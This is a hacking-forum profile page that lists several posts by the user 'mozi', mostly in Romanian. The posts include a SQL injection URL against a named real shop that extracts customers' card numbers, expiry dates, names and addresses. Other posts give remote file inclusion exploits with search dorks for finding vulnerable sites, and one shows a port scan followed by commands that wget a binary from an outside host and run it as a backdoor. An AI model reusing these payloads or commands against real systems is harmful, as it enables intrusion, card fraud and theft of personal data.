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Everything posted by mozi

  1. Dork : "Powered by Dimension" xpl: includes/functions.php?phpbb_root_path= Source Code : http://www.xs4all.nl/~hkicken/plusxl20/phpbb2_plusxl_20_272.zip
  2. un exemplu la un site spart prin sql .. nu stiam unde`l postez frate poate va trebuie eu stiu
  3. shoping sql attak http://www.mmfootwear.com.au/shopping/shopdisplayproducts.asp?id=10' Microsoft JET Database Engine error '80040e14' http://www.mmfootwear.com.au/shopping/shopdisplayproducts.asp?id=10%20union%20select%201%20,2,ocardtype%2b'/'%2bocardno%2b'/'%2bofirstname%2b'/'%2bolastname%2b'/'%2bostate%2b'/'%2bocardexpires%2b'/'%2bopostcode%2b'/'%2boaddress%2b'/'%2bophone%2b'/'%2boaddress%2b'/'%2boemail%2b'/'%2bostate,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,%2019,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35%20,36,37%20from%20orders%22--sp_password
  4. mozi

    edit-x rfi

    editx/add_address.php $_SESSION = array(); include($include_dir.'/'.'session.'.PHP); include($include_dir.'/'.'function.'.PHP); require_once("../ups/upsavs.php"); http://site.com/[PATH]/editx/add_address.php?include_dir= google dork: "powered by edit-x"
  5. ba eu nu l-am compilat batate l-am rulat asa cum mi l-ai dat tu ,... si imida eroare pune undeva scriptu bun sa mearga sus ..
  6. syntax error at get line 2, near "= ;" Execution of get aborted due to compilation errors.
  7. root@filesrvx2:/# nmap Starting'>http://www.fs2004.com Starting nmap V. 2.54BETA34 ( http://www.insecure.org/nmap/ ) Interesting ports on 4.40.1343.static.theplanet.com ( (The 1528 ports scanned but not shown below are in state: filtered) Port State Service 21/tcp open ftp 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop-3 143/tcp open imap2 443/tcp open https 3000/tcp closed ppp 3001/tcp closed nessusd 3005/tcp closed deslogin 3006/tcp closed deslogind 3049/tcp closed cfs 3064/tcp closed distrib-net-proxy 3086/tcp closed sj3 3128/tcp closed squid-http 3141/tcp closed vmodem 3264/tcp closed ccmail 3306/tcp open mysql 3333/tcp closed dec-notes 3389/tcp closed msrdp 3421/tcp closed bmap 3455/tcp closed prsvp 3456/tcp closed vat 3457/tcp closed vat-control 3462/tcp closed track 4672/tcp closed rfa 6346/tcp closed gnutella 6699/tcp closed napster acuma alegem un port inchis wget chmod'>http://members.lycos.co.uk/planetinsomnia/miro chmod +777 miro;./miro port --> care vreti voi pass: lol
  8. fainutz http://chesterlandrotary.org/rotary/modules/Forums/admin/scan1.5.2/index.html greetz: xIgOr
  9. ce draq l-ai sters am vrut sa vad si eu cum merje lOL
  10. # Author: [mail]mozi2weed@yahoo.com[/mail] mozi # WORK system e-commerce Remote File Inclusion Vulnerability Download: ------------------------------------------------------------------ include'>http://sourceforge.net/project/showfiles.php?group_id=101493&package_id=189012&release_id=425081 ------------------------------------------------------------------ include ($g_files_php."include_includes.inc"); include ($g_include."include_css.inc"); ?> if ( $g_waiting_page == "ON") include ($g_include."include_waiting_page.inc"); _________________________________________________________________ http://site.com/[path]/administration/module/catalogue/add_thema_sub.php?g_include=EVIL and thers many more ..
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